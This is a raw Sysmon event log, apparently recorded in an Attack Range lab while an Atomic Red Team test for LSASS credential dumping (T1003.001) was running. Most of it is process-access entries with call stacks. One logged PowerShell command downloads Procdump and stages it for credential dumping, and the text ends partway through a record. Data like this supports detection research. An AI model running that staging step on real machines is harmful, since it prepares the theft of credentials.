21:09:52.823{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024853Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024852Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024851Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024850Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.823{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest \""https://download.sysinternals.com/files/Procdump.zip\"" -OutFile \""$env:TEMP\Procdump.zip\"" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe) -Force | Out-Null Copy-Item $env:TEMP\Procdump\Procdump.exe C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000024846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.807{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000024845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.807{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000024844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.794{4DB9351A-A320-60D3-2C06-00000000CF01}7136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.667{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.667{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.604{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.604{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000024839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:52.573{4DB9351A-A320-60D3-2C06-00000000CF01}7136\PSHost.132689561924459827.7136.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.542{4DB9351A-A320-60D3-2C06-00000000CF01}7136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_upxacdcz.e4p.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.542{4DB9351A-A320-60D3-2C06-00000000CF01}7136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bnp2zdsa.zus.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.510{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bnp2zdsa.zus.ps12021-06-23 21:09:52.510 10341000x800000000000000024835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.495{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.448{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.448{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.432{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.432{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2C06-00000000CF01}7136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#